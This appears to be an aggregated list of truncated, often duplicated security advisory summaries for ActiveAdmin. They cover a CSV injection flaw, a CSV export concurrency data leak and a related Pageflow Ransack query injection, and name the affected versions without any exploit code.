GHSA-XHVV-3JWW-C487 ActiveAdmin CSV Injection leading to sensitive information disclosure

Impact In ActiveAdmin versions prior to 3.2.0, maliciously crafted spreadsheet formulas could be uploaded as part of admin data that, when exported to a CSV file and the imported to a spreadsheet program like libreoffice, could lead to remote code execution and private data exfiltration. The...

CVE-2023-50448

Summary: CVE-2023-50448 affects ActiveAdmin (Ruby on Rails) before 2.12.0, where a concurrency issue in the CSV export path can let a user access data belonging to another user. The root cause is a shared, unsynchronized variable that holds the collection to be exported, allowing timing-based lea...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

Duplicate Advisory: ActiveAdmin vulnerable to CSV injection

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xhvv-3jww-c487. This link is maintained to preserve external references. Original Description csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

GHSA-RQXC-9P8H-XQGQ Duplicate Advisory: ActiveAdmin vulnerable to CSV injection

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xhvv-3jww-c487. This link is maintained to preserve external references. Original Description csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

CVE-2023-51763

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

CVE-2023-51763

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

Input validation

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

ActiveAdmin vulnerable to CSV injection

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

CVE-2023-51763

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

ActiveAdmin vulnerable to CSV injection

csvbuilder.rb in ActiveAdmin aka Active Admin before 3.2.0 allows CSV injection...

Sensitive Information Disclosure

activeadmin is vulnerable to Sensitive Information Disclosure. The vulnerability is caused due to a concurrency issue wherein a malicious user is able to access private data of another user. The export data feature is affected, caused by a variable holding collection to be exported which is not...

Information Exposure

Overview Affected versions of this package are vulnerable to Information Exposure due to a concurrency issue that results in a shared variable not being properly synchronized. An attacker with access to the same ActiveAdmin application can obtain private data intended for another user by timing...

GHSA-356J-HG45-X525 Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

PT-2023-31554 · Unknown · Activeadmin

Name of the Vulnerable Software and Affected Versions: ActiveAdmin versions prior to 2.12.0 Description: A concurrency issue in ActiveAdmin allows a malicious actor to access potentially private data belonging to another user by making CSV export requests at specific times. The issue is caused by...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

Pageflow vulnerable to sensitive user data extraction via Ransack query injection

Impact The attack allows extracting sensitive properties of database objects that are associated with users or entries belonging to an account that the attacker has access to. Pageflow uses the ActiveAdmin Ruby library to provide some management features to its users. ActiveAdmin relies on the...

GHSA-WRRW-CRP8-979Q Pageflow vulnerable to sensitive user data extraction via Ransack query injection

Impact The attack allows extracting sensitive properties of database objects that are associated with users or entries belonging to an account that the attacker has access to. Pageflow uses the ActiveAdmin Ruby library to provide some management features to its users. ActiveAdmin relies on the...